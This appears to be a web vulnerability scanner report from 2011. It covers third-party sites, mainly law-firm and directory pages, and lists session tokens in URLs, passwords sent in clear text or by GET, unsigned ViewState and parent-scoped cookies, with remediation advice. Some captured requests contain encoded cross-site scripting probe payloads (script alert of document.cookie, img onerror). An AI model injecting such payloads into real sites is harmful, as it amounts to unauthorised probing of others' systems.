<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... </div>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... </div>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... </div>
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.vault.com/wps/portal/usa/membership
The form contains the following password fields:
UserPassword
UserConfirm
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /about_the_firm_recognition_rankings.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP</title> <meta name="Description" content="Arnold & ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=AntonipillaiJustinS&action=view&id=420&CFID=9488352&CFTOKEN=58883300">Justin Antonipillai</a> ...[SNIP]... </em> ranked Arnold & Porter as a leading law firm for International Arbitration and Capital Markets. The publication also ranked the following lawyers as "Leading Individuals": <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=9488352&CFTOKEN=58883300">Paolo Di Rosa</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=9488352&CFTOKEN=58883300">Gaela Gehring Flores</a> for International Arbitration; <a href="http://www.arnoldporter.com/professionals.cfm?u=HarringtonGregory&action=view&id=946&CFID=9488352&CFTOKEN=58883300">Gregory Harrington</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=StumpfMarkH&action=view&id=116&CFID=9488352&CFTOKEN=58883300">Mark Stumpf</a> ...[SNIP]... </em> named Arnold & Porter antitrust partner <a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&action=view&id=29&CFID=3285218&CFTOKEN=60209382">Deborah Feinstein</a> ...[SNIP]... </em> annual Awards Ceremony in London on June 22nd. The team, led by London partners <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=2238313&CFTOKEN=85690966">Tim Frazer</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=HinchliffeSusan&action=view&id=234&CFID=2238313&CFTOKEN=85690966">Susan Hinchliffe</a> ...[SNIP]... <p>Attorney General Eric Holder presented Arnold & Porter counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=PitofskyRobert&action=view&id=424&CFID=1875550&CFTOKEN=71164531">Robert Pitofsky</a> ...[SNIP]... </a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=DregerGingerR&action=view&id=5423&CFID=476026&CFTOKEN=73240865">Ginger Dreger</a> ...[SNIP]... </em> named Arnold & Porter partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=417833&CFTOKEN=96803455">William Baer</a> ...[SNIP]... </a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=RubelEricA&action=view&id=96&CFID=15574942&CFTOKEN=53050326">Eric Rubel</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=8038589&CFTOKEN=38448975">William Baer</a> ...[SNIP]... </a> the "Washington, DC Bankruptcy and Creditor-Debtor Rights Lawyer of the Year"; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&action=view&id=189&CFID=8038589&CFTOKEN=38448975">Michael Gerrard</a> the "New York Environmental Lawyer of the Year" and <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=8038589&CFTOKEN=38448975">John D. Hawke Jr.</a> ...[SNIP]... ife sciences: regulatory, compliance & competition; and product liability: mainly defendant; and was ranked as a "Leading Firm" for intellectual property and media & entertainment: publishing. <a href="http://www.arnoldporter.com/professionals.cfm?u=DoddsSmithIan&action=view&id=457&CFID=8038589&CFTOKEN=38448975">Ian Dodds-Smith</a> ...[SNIP]... </a> was ranked for life sciences and product liability; <a href="http://www.arnoldporter.com/professionals.cfm?u=TsangLincoln&action=view&id=553&CFID=8038589&CFTOKEN=38448975">Lincoln Tsang</a> was ranked for life sciences; <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=8038589&CFTOKEN=38448975">Ian Kirby</a> ...[SNIP]... </a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=DriverHElizabeth&action=view&id=435&CFID=8038589&CFTOKEN=38448975">Elizabeth Driver</a>, and <a href="http://www.arnoldporter.com/professionals.cfm?u=BoreJacqueline&action=view&id=799&CFID=8038589&CFTOKEN=38448975">Jacqueline Bore</a> were ranked for product liability; <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=8038589&CFTOKEN=38448975">Tim Frazer</a> was ranked for competition/European Law; <a href="http://www.arnoldporter.com/professionals.cfm?u=ClintonDavisHenry&action=view&id=5083&CFID=8038589&CFTOKEN=38448975">Henry Clinton-Davis</a> was ranked for employment; and <a href="http://www.arnoldporter.com/professionals.cfm?u=WillcocksJeremy&action=view&id=378&CFID=8038589&CFTOKEN=38448975">Jeremy Willcocks</a> ...[SNIP]... </em> In terms of practice areas, the group certainly enjoys a diverse caseload, although it is in the field of investment arbitration that it earns the most significant praise." The publication named <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=793238&CFTOKEN=19009463">Paolo Di Rosa</a> as a "Leading Individual" for International Arbitration and also singled out <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=793238&CFTOKEN=19009463">Gaela Gehring Flores</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=KalickiJeanEngelmayer&action=view&id=254&CFID=793238&CFTOKEN=19009463">Jean Kalicki</a> ...[SNIP]... </em> 2009 named firm Chair <a href="http://www.arnoldporter.com/professionals.cfm?u=MilchThomasH&action=view&id=79&CFID=793238&CFTOKEN=19009463">Thomas Milch</a> and senior counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&action=view&id=189&CFID=793238&CFTOKEN=19009463">Michael Gerrard</a> on its "Most Highly Regarded Individuals - Global" list. Arnold & Porter was the only firm to have two individuals ranked on the list of ten international lawyers. Partners <a href="http://www.arnoldporter.com/professionals.cfm?u=BilesBlakeA&action=view&id=8&CFID=793238&CFTOKEN=19009463">Blake Biles</a> ...[SNIP]... </a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=MartelJonathan&action=view&id=74&CFID=793238&CFTOKEN=19009463">Jonathan Martel</a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=NardiKarenJ&action=view&id=5263&CFID=793238&CFTOKEN=19009463">Karen Nardi</a>, and <a href="http://www.arnoldporter.com/professionals.cfm?u=NorrisTrentonH&action=view&id=5056&CFID=793238&CFTOKEN=19009463">Trenton Norris</a> ...[SNIP]... ual property, media and entertainment, and pharmaceuticals and biotechnology); and transport (rail). The firm was also ranked as a "US firm in London" for Dual US/UK law capability: 25-50 fee-earners. <a href="http://www.arnoldporter.com/professionals.cfm?u=DoddsSmithIan&action=view&id=457&CFID=793238&CFTOKEN=19009463">Ian Dodds-Smith</a> was named a "leading individual" for product liability and pharmaceuticals & biotechnology; and <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=793238&CFTOKEN=19009463">Ian Kirby</a> ...[SNIP]... </em> "Top Washington Lawyers" feature, published in its September 18-24, 2009 edition. <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=793238&CFTOKEN=19009463">Gaela Gehring Flores</a> ...[SNIP]... </a>; <a href="http://www.arnoldporter.com/professionals.cfm?u=KahnSarahE&action=view&id=99&CFID=793238&CFTOKEN=19009463">Sarah Kahn</a> was named a winner for Corporate M&A; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerschDavidP&action=view&id=37&CFID=793238&CFTOKEN=19009463">David Gersch</a> ...[SNIP]... </a> was named a winner for Technology Transactions; <a href="http://www.arnoldporter.com/professionals.cfm?u=RifkindAmyB&action=view&id=231&CFID=793238&CFTOKEN=19009463">Amy Rifkind</a> was named as a winner for Real Estate Transactions; and <a href="http://www.arnoldporter.com/professionals.cfm?u=SotskyLester&action=view&id=111&CFID=793238&CFTOKEN=19009463">Les Sotsky</a> ...[SNIP]... <p><a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&action=view&id=29&CFID=793238&CFTOKEN=19009463">Deborah Feinstein</a> ...[SNIP]... </a> (Brussels) and <a href="http://www.arnoldporter.com/professionals.cfm?u=VanKerckhoveMarleen&action=view&id=616&CFID=793238&CFTOKEN=19009463">Marleen Van Kerckhove</a> ...[SNIP]... <p>The New York City Bar Association's (NYCBA) has named <a href="http://www.arnoldporter.com/professionals.cfm?u=FucciFrederickR&action=view&id=4980&CFID=793238&CFTOKEN=19009463">Frederick R. Fucci</a> ...[SNIP]... </em> 2009 list: <a href="http://www.arnoldporter.com/professionals.cfm?u=GargantaAngelA&action=view&id=5055&CFID=793238&CFTOKEN=19009463">Angel Garganta</a> (business litigation, civil litigation defense, and banking), <a href="http://www.arnoldporter.com/professionals.cfm?u=NardiKarenJ&action=view&id=5263&CFID=793238&CFTOKEN=19009463">Karen Nardi</a> (environmental), <a href="http://www.arnoldporter.com/professionals.cfm?u=NorrisTrentonH&action=view&id=5056&CFID=793238&CFTOKEN=19009463">Trenton Norris</a> ...[SNIP]... </a> (intellectual property litigation, civil rights/first amendment, and alternative dispute resolution). <a href="http://www.arnoldporter.com/professionals.cfm?u=ChaninRachelL&action=view&id=5095&CFID=793238&CFTOKEN=19009463">Rachel Chanin</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=793238&CFTOKEN=19009463">John D. Hawke, Jr.</a> ...[SNIP]... <p>The Internal Revenue Service's Advisory Committee on Tax Exempt and Government Entities (ACT) named <a href="http://www.arnoldporter.com/professionals.cfm?u=JosephJamesP&action=view&id=53&CFID=793238&CFTOKEN=19009463">James Joseph</a> ...[SNIP]... p>Arnold & Porter was recommended in England for IP: commercial IP and IP: non-patent litigation; was recommended in Washington, DC for IP; and was recognized in England for IP: patent litigation. <a href="http://www.arnoldporter.com/professionals.cfm?u=DickinsonRichard&action=view&id=5050&CFID=793238&CFTOKEN=19009463">Richard Dickinson</a> was recognized for IP: commercial IP (England); <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=793238&CFTOKEN=19009463">Ian Kirby</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=JohnstonRonaldL&action=view&id=306&CFID=793238&CFTOKEN=19009463">Ronald Johnston</a> ...[SNIP]... <p>The National Asian Pacific American Bar Association (NAPABA) named San Francisco partner <a href="http://www.arnoldporter.com/professionals.cfm?u=AgarwalMonty&action=view&id=5058&CFID=793238&CFTOKEN=19009463">Monty Agarwal</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=MorrisSean&action=view&id=263&CFID=793238&CFTOKEN=19009463">Sean Morris</a> ...[SNIP]... <p>The Executive Council of the Banking Law Committee of the Federal Bar Association awarded <a href="http://www.arnoldporter.com/attorneys.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=6662351&CFTOKEN=25960794">John D. Hawke, Jr.</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=ColleyMarkD&action=view&id=913&CFID=793238&CFTOKEN=19009463">Mark Colley</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=GoodwinMichaelD&action=view&id=163&CFID=793238&CFTOKEN=19009463">Michael Goodwin</a> ...[SNIP]... </em>awarded partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=793238&CFTOKEN=19009463">William Baer</a> ...[SNIP]... </em>named <a href="http://www.arnoldporter.com/professionals.cfm?u=GarrettRobertAlan&action=view&id=36&CFID=793238&CFTOKEN=19009463">Robert Garrett</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BlackburnJamesS&action=view&id=301&CFID=793238&CFTOKEN=19009463">James Blackburn</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=MacdonaldTimothyR&action=view&id=279&CFID=793238&CFTOKEN=19009463">Timothy Macdonald</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/attorneys.cfm?u=QuinnJohnJ&action=view&id=225&CFID=6160598&CFTOKEN=81825356">John "Jack" Quinn</a> ...[SNIP]...
7. Password field submitted using GET methodpreviousnext There are 5 instances of this issue:
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start login --> <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input class="" id="passwordinput" name="password" type="password"> <div id="cnnConnectLoginErrors" style="display: none;"> ...[SNIP]...
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start reset password --> <form id="cnnConnectFormReset" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input type="password" id="new_password" name="newPassword"> <div id="cnnConnectResetErrors"> ...[SNIP]...
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start registration --> <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input id="signup_password" name="password" maxlength="10" type="password" /> <span class="fieldTip"> ...[SNIP]...
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.local.com/results.aspx
The form contains the following password field:
password
Request
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.vault.com/wps/portal/usa/membership
The form contains the following password fields:
UserPassword
UserConfirm
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.cov.com/zh-CN/offices/office.aspx?office=64">here</a>.</h2> </body></html>
<!DOCTYPE HTML PUBLIC "-/ ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM2OTAxODQ2ZGQ=" /> ...[SNIP]...
9. Cookie scoped to parent domainpreviousnext There are 42 instances of this issue:
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw HTTP/1.1 Host: wsdsapi.infospace.com Proxy-Connection: keep-alive Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dc HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFTOKEN=35971701;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A41%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A40%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6035991&rn=57307763&c7=http%3A%2F%2Fwww.yellowpages.com%2FWashington-DC74302%253Cimg%2520src%253da%2520onerror%253dalert(1)%253E9c7a66be0e0%2FAttorneys&c8=No%20Location%20Found%20-%20YP.com&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Wed, 19 Jan 2011 15:26:51 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 18-Jan-2013 15:26:51 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /OzoDB/cutils/R52_5/jsc/933/egc.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 6 Content-Type: application/x-javascript Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com; P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2608430956 Cache-Control: max-age=2007212 Expires: Fri, 11 Feb 2011 23:40:50 GMT Date: Wed, 19 Jan 2011 18:07:18 GMT Connection: close
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fm.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 911 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0daa-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=285 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:14 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com;
FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
